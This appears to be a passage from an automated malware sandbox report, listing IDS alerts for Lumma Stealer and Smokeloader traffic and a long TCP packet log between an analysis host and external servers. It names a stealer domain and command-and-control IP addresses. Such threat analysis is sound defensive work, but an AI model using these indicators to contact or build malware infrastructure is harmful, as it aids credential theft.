GetOEMCP, GetCPInfo, HeapReAlloc, SetStdHandle, CreateFileW
USER32.dll	GetSysColorBrush, DdeFreeStringHandle
GDI32.dll	GetCharWidthW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Japanese	Japan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/26/24-10:30:28.747460	UDP	2052787	ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop)	63577	53	192.168.2.5	1.1.1.1
05/26/24-10:33:44.583911	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49788	80	192.168.2.5	88.225.215.104
05/26/24-10:30:27.910020	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49718	80	192.168.2.5	190.187.52.42
05/26/24-10:33:10.602930	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49782	80	192.168.2.5	88.225.215.104
05/26/24-10:32:35.641693	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49776	80	192.168.2.5	190.187.52.42
05/26/24-10:30:22.667559	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49715	80	192.168.2.5	190.187.52.42
05/26/24-10:30:18.841635	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49712	80	192.168.2.5	190.187.52.42
05/26/24-10:32:54.137738	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49779	80	192.168.2.5	88.225.215.104
05/26/24-10:33:26.674969	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49785	80	192.168.2.5	88.225.215.104
05/26/24-10:30:25.176892	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49716	80	192.168.2.5	190.187.52.42
05/26/24-10:30:20.143672	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49713	80	192.168.2.5	190.187.52.42
05/26/24-10:30:30.459445	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49722	80	192.168.2.5	190.187.52.42
05/26/24-10:32:23.617804	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49774	80	192.168.2.5	190.187.52.42
05/26/24-10:33:31.550599	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49786	80	192.168.2.5	88.225.215.104
05/26/24-10:32:59.095133	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49780	80	192.168.2.5	88.225.215.104
05/26/24-10:32:40.871504	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49777	80	192.168.2.5	190.187.52.42
05/26/24-10:33:15.562340	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49783	80	192.168.2.5	88.225.215.104
05/26/24-10:30:17.597892	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49711	80	192.168.2.5	190.187.52.42
05/26/24-10:30:21.399810	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49714	80	192.168.2.5	190.187.52.42
05/26/24-10:30:54.355801	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49731	80	192.168.2.5	190.187.52.42
05/26/24-10:32:12.622814	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49772	80	192.168.2.5	190.187.52.42
05/26/24-10:33:50.615202	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49789	80	192.168.2.5	88.225.215.104
05/26/24-10:33:05.584329	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49781	80	192.168.2.5	88.225.215.104
05/26/24-10:30:59.974334	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49734	80	192.168.2.5	190.187.52.42
05/26/24-10:32:30.788438	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49775	80	192.168.2.5	190.187.52.42
05/26/24-10:30:29.219756	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49720	80	192.168.2.5	190.187.52.42
05/26/24-10:33:21.922977	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49784	80	192.168.2.5	88.225.215.104
05/26/24-10:32:18.038749	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49773	80	192.168.2.5	190.187.52.42
05/26/24-10:32:49.228874	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49778	80	192.168.2.5	88.225.215.104
05/26/24-10:30:31.722779	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49723	80	192.168.2.5	190.187.52.42
05/26/24-10:33:38.557470	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49787	80	192.168.2.5	88.225.215.104
05/26/24-10:30:55.854761	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49732	80	192.168.2.5	190.187.52.42

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 10:30:17.592623949 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:17.597677946 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:17.597767115 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:17.597892046 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:17.597928047 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:17.648571968 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:17.699470997 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.736025095 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.740672112 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.740871906 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.741432905 CEST	49711	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.744287014 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.792629957 CEST	80	49711	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.839428902 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.839521885 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.841634989 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.841655970 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:18.893985987 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:18.943357944 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.036725044 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.041570902 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.041640997 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.041685104 CEST	49712	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.044198990 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.092819929 CEST	80	49712	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.143328905 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.143582106 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.143671989 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.143706083 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:20.196993113 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:20.247482061 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.289721966 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.297327995 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.297519922 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.297862053 CEST	49713	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.300136089 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.348496914 CEST	80	49713	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.399483919 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.399614096 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.399810076 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.399823904 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:21.456639051 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:21.507796049 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.557220936 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.563137054 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.563201904 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.563277006 CEST	49714	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.566423893 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.620475054 CEST	80	49714	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.667305946 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.667402029 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.667558908 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.667579889 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:22.927488089 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:22.979434967 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:24.123642921 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:24.129972935 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:24.130042076 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.044363022 CEST	49715	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.049818039 CEST	80	49715	190.187.52.42	192.168.2.5
May 26, 2024 10:30:25.171417952 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.176654100 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:25.176750898 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.176892042 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.176913977 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:25.232568979 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:25.283560038 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:26.578068018 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:26.584521055 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:26.584605932 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:26.584695101 CEST	49716	80	192.168.2.5	190.187.52.42
May 26, 2024 10:30:26.586774111 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:26.640707970 CEST	80	49716	190.187.52.42	192.168.2.5
May 26, 2024 10:30:26.658961058 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:26.659054041 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:26.659168959 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:26.669393063 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.335818052 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.339023113 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.339198112 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.342849970 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.342888117 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.342950106 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.352406979 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.356265068 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.356298923 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.356374025 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.363976002 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.363991022 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.364053011 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.371763945 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.371778011 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.371790886 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.371819973 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.371855021 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.442156076 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.443476915 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.443574905 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.446471930 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.449532986 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.449583054 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.452594042 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.452610016 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.452624083 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.452657938 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.458626032 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.458687067 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.461035967 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.461051941 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.461103916 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.465915918 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.465960979 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.466027021 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.470774889 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.470788956 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.470844984 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.475379944 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.475394011 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.475406885 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.475456953 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.479424953 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.479439974 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.479477882 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.483407021 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.483422995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.483462095 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.487437010 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.487452030 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.487488031 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.491436958 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.491467953 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.491502047 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.540442944 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.552613974 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.553574085 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.553643942 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.555600882 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.557851076 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.557949066 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.559997082 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.560022116 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.560035944 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.560060978 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.564332008 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.564382076 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.566546917 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.566566944 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.566612005 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.570941925 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.570960045 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.571007967 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.574368000 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.574383974 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.574440002 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.577877045 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.577893972 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.577908039 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.577959061 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.584343910 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.584384918 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.584424973 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.585624933 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.585640907 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.585674047 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.587738991 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.587754965 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.587794065 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.590904951 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.590920925 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.590934038 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.590965986 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.590990067 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.593718052 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.593734026 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.593794107 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.596461058 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.598010063 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.598025084 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.598059893 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.600760937 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.600775957 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.600816965 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.604074001 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.604090929 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.604152918 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.606826067 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.606853008 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.606882095 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.607434988 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.607481003 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.607503891 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.609843016 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.609857082 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.609891891 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.612236023 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.612251043 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.612283945 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.614609003 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.614624977 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.614654064 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.641952038 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.642040014 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.642548084 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.646964073 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.647049904 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.647079945 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.665072918 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.665154934 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.665586948 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.667036057 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.667218924 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.667927027 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.669147015 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.669182062 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.669214010 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.671499968 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.671567917 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.672665119 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.672698975 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.672758102 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.673825026 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.673860073 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.673918009 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.675476074 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.675565958 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.675626040 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.677297115 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.678261995 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.678293943 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.678328037 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.680331945 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.680365086 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.680399895 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.682830095 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.682864904 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.682895899 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.682900906 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.682950020 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.683594942 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.683629036 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.683686018 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.685092926 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.685127020 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.685184002 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.686903000 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.688288927 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.688358068 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.688652039 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.689435005 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.689492941 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.689730883 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.690623045 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.690682888 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.691190958 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.691939116 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.691998959 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.692595959 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.693326950 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.693387985 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.693977118 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.694689035 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.694746971 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.695385933 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.695420027 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.695477962 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.696121931 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.696156025 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.696218967 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.697571039 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.697649002 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.697707891 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.698661089 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.698693991 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.698767900 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.700098991 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.700131893 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.700186014 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.701745987 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.702310085 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.702342033 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.702368021 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.702994108 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.703048944 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.703665018 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.703697920 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.703728914 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.703752041 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.704587936 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.704622984 CEST	80	49717	45.129.96.86	192.168.2.5
May 26, 2024 10:30:27.704648972 CEST	49717	80	192.168.2.5	45.129.96.86
May 26, 2024 10:30:27.705573082 CEST	80	49717	45.129.96.86	192.168.2.5
